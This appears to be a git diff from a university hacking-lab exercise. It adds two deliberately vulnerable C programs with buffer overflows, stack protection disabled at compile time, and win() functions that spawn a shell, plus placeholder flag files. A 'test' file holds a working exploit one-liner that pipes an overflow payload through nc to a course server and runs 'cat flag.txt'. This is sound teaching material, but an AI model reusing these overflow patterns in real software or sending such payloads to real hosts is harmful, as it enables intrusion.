diff --git a/4/level1/core b/4/level1/core
new file mode 100644
index 0000000..0b475d3
Binary files /dev/null and b/4/level1/core differ
diff --git a/4/level1/flag.txt b/4/level1/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level1/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level1/level1 b/4/level1/level1
new file mode 100755
index 0000000..ffd44de
Binary files /dev/null and b/4/level1/level1 differ
diff --git a/4/level1/level1.c b/4/level1/level1.c
new file mode 100644
index 0000000..3a03dd0
--- /dev/null
+++ b/4/level1/level1.c
@@ -0,0 +1,58 @@
+// gcc -o level1 -no-pie -fno-stack-protector level1.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <unistd.h>
+
+struct topic {
+  char question[64];
+  char answer[32];
+  int (*check_response)(struct topic *topic);
+};
+
+void win() {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int check_math_response(struct topic *topic) {
+  int answer = atoi(topic->answer);
+  if (answer == 0x7a69) {
+    puts("You got it.");
+    return 0;
+  } else {
+    puts("Try again.");
+    return 1;
+  }
+}
+
+int check_weather_response(struct topic *topic) {
+  if (!strcmp(topic->answer, "Yes\n")) {
+    puts("It's inevitable.");
+    return 0;
+  } else {
+    puts("Are you sure about that?");
+    return 1;
+  }
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  struct topic topics[] = {
+      {"What is 3077 * 10 + 567?", "", check_math_response},
+      {"Will it ever rain this year?", "", check_weather_response}};
+
+  srand(time(NULL));
+  struct topic *topic = &topics[rand() % 2];
+
+  puts(topic->question);
+  fgets(topic->answer, sizeof(*topic), stdin);
+  printf("addr: %X\n", topic->check_response);
+  return topic->check_response(topic);
+}
diff --git a/4/level1/test b/4/level1/test
new file mode 100644
index 0000000..2abce17
--- /dev/null
+++ b/4/level1/test
@@ -0,0 +1,5 @@
+unit activation code
+32x spacer for array
+then jump address (reverse order)
+
+printf 'p90xiy6HFLfLKSyxptNlpYr1IHGlZvMS\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x36\x12\x40\00\00\00\00\00\ncat flag.txt\n' | nc binexp.stud12.hacklab.ias.tu-bs.de 4001
diff --git a/4/level2/flag.txt b/4/level2/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level2/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level2/level2 b/4/level2/level2
new file mode 100755
index 0000000..e2258e0
Binary files /dev/null and b/4/level2/level2 differ
diff --git a/4/level2/level2.c b/4/level2/level2.c
new file mode 100644
index 0000000..9675792
--- /dev/null
+++ b/4/level2/level2.c
@@ -0,0 +1,22 @@
+// gcc -o level2 -no-pie -fno-stack-protector level2.c
+#include <stdio.h>
+#include <unistd.h>
+
+void win() {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}